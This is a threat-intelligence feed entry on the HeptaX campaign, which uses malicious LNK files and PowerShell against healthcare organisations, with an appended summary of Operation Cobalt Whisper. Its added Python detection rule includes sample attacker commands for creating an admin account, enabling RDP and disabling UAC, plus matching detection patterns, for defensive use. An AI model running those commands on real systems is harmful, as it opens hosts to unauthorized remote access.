Source: RiskIQ
Identifier: 8601768
Publication date: 2024-10-25 19:15:07 (seen: 2024-10-25 20:07:18)
Title: HeptaX: Unauthorized RDP Connections for Cyberespionage Operations (Recycled)
Text:
#### Targeted Industries
- Healthcare & Public Health
## Snapshot
Cyble Research and Intelligence Labs (CRIL) has identified an active cyberattack campaign, dubbed "HeptaX", that uses malicious shortcut files (LNK files) in a complex, multi-stage attack chain. The campaign has not been attributed to a known threat actor.
## Description
The attack begins with a zip file containing the malicious LNK file, likely distributed via phishing. Based on the LNK file's title, CRIL assesses that HeptaX targets healthcare organizations. Upon execution, the LNK file launches PowerShell commands that download additional PowerShell scripts and BAT files to the victim's device, enabling the attackers to create an administrative account and adjust Remote Desktop (RDP) settings. This access simplifies unauthorized RDP sessions for ongoing exploitation.
The campaign uses additional tools, like ChromePass, to extract saved passwords from Chromium-based browsers, putting victims' accounts at further risk. HeptaX's repeated campaigns over the past year indicate that it has successfully leveraged the same core tactics despite its visibility.
The scripts also systematically gather detailed system information and send it back to the command-and-control server, making these infections both stealthy and versatile. By lowering security controls, disabling User Account Control (UAC) and gaining administrative privileges, the attackers can install further malware, exfiltrate data and monitor system activity undetected. The campaign highlights the need for enhanced detection capabilities against script-based attacks, which have allowed this group to remain largely unnoticed despite its prolonged activity and recurring techniques.
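The account creation, RDP enablement and UAC disablement described above are individually noisy but, together on one host within a short window, make a useful correlation rule. The following Python is an added example (not code from Cyble, Microsoft or the report) that scores constructed process and registry events per host; the pipe-delimited event format, the indicator patterns, the sample hostnames and the 15-minute window are all assumptions.

```python
"""Correlate HeptaX-style post-exploitation behaviours per host.

Input lines are constructed telemetry in the form  time|host|type|detail
(type is 'process' or 'registry'); the format is an assumption, not a real
sensor's output."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry; WS-01 shows the full chain, WS-02/WS-03 a single event each.
SAMPLE_EVENTS = """\
2024-10-25T09:00:01|WS-01|process|powershell.exe -w hidden -c Invoke-WebRequest <staging-url-placeholder>
2024-10-25T09:00:05|WS-01|process|net user svc_helper <pw> /add
2024-10-25T09:00:06|WS-01|process|net localgroup administrators svc_helper /add
2024-10-25T09:00:09|WS-01|registry|HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections=0
2024-10-25T09:00:10|WS-01|registry|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA=0
2024-10-25T11:30:00|WS-02|process|net localgroup administrators alice /add
2024-10-25T14:00:00|WS-03|registry|HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections=0
"""

# Each indicator: (event type it applies to, pattern over the detail field).
INDICATORS = {
    "ps_download": ("process", re.compile(r"powershell.*(invoke-webrequest|iwr|downloadstring)", re.I)),
    "admin_account": ("process", re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    "rdp_enabled": ("registry", re.compile(r"fDenyTSConnections=0$", re.I)),
    "uac_disabled": ("registry", re.compile(r"EnableLUA=0$", re.I)),
}
WINDOW = timedelta(minutes=15)   # assumed correlation window
MIN_INDICATORS = 3               # distinct behaviours needed to raise a finding


def parse(text):
    """Yield (timestamp, host, type, detail) tuples from pipe-delimited lines."""
    for line in text.splitlines():
        if line.strip():
            ts, host, kind, detail = line.split("|", 3)
            yield datetime.fromisoformat(ts), host, kind, detail


def detect(text, window=WINDOW, min_indicators=MIN_INDICATORS):
    """Return {host: sorted indicator names} for hosts showing at least
    `min_indicators` distinct behaviours inside one `window`."""
    hits = defaultdict(list)                       # host -> [(time, indicator)]
    for ts, host, kind, detail in parse(text):
        for name, (want_kind, pattern) in INDICATORS.items():
            if kind == want_kind and pattern.search(detail):
                hits[host].append((ts, name))
    findings = {}
    for host, seq in hits.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):       # slide the window over each start
            names = {n for t, n in seq[i:] if t - start <= window}
            if len(names) >= min_indicators:
                findings[host] = sorted(names)
                break
    return findings


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))   # only WS-01 crosses the threshold
```

Lowering `min_indicators` to 1 turns the rule into a plain indicator match, which is useful for hunting but reinstates the noise the correlation was meant to remove.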
## Microsoft analysis and additional OSINT context
ChromePass is a password recovery tool designed to retrieve and display saved login credentials stored in Chromium-based browsers such as Chrome, Brave and Edge. Although it has legitimate password-recovery uses, malicious actors exploit ChromePass to covertly extract usernames and passwords from victim devices. Once deployed on a compromised system, ChromePass can quickly locate and decrypt passwords, which are often stored in a browser's encrypted database for autofill purposes. By exfiltrating these credentials, attackers gain unauthorized access to users' sensitive accounts, including email, financial services and corporate systems. This data can then be leveraged for further malicious activities such as credential stuffing, identity theft and spear phishing, enabling cybercriminals to expand their reach and compromise additional systems tied to the victim's accounts.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/ed
Tags: Malware, Tool, Threat, Medical
Reposts of the article (1):
Source: RiskIQ
Identifier: 8601746
Publication date: 2024-10-25 17:22:14 (seen: 2024-10-25 18:07:27)
Title: Operation Cobalt Whisper: Threat Actor Targets Multiple Industries Across Hong Kong and Pakistan (Recycled)
Text:
#### Targeted Geolocations
- Pakistan
- China
#### Targeted Industries
- Defense Industrial Base
- Education
- Higher Education
- Energy
- Information Technology
- Healthcare & Public Health
## Snapshot
SEQRITE Labs' APT team has exposed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries in Hong Kong and Pakistan.
## Description
This operation extensively uses the Cobalt Strike post-exploitation tool, delivered via obfuscated VBScript in infected archives. SEQRITE identified over 20 infection chains, primarily affecting organizations in Hong Kong but also Pakistan, with decoy documents in RAR archives containing both PDF and LNK files. Industries impacted by the campaign include defense, education, environmental engineering, energy, cybersecurity, aviation, and healthcare.
Technical analysis reveals a two-stage infection process, where an initial LNK executes a VBScript to achieve persistence and hide activity, followed by a Cobalt Strike beacon disguised as a legitimate executable that connects back to the attacker. SEQRITE's investigations found commonalities in naming conventions, particularly use of the filename "ImeBroker.exe", to deploy Cobalt Strike implants across multiple activity clusters.
Through file path artifacts, machine IDs, and configuration similarities, SEQRITE linked clusters of activity to Operation Cobalt Whisper, including those aimed at the Pakistani defense sector and electrotechnical researchers. These campaigns reveal sophisticated tactics designed to exploit high-value information from specific industry sectors across Asia, with consistent command-and-control patterns registered on Tencent's network infrastructure.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection.
- Microsoft
Tags: Ransomware, Malware, Tool, Threat, Industrial, Medical
The article does not appear to have been reused from a previous one.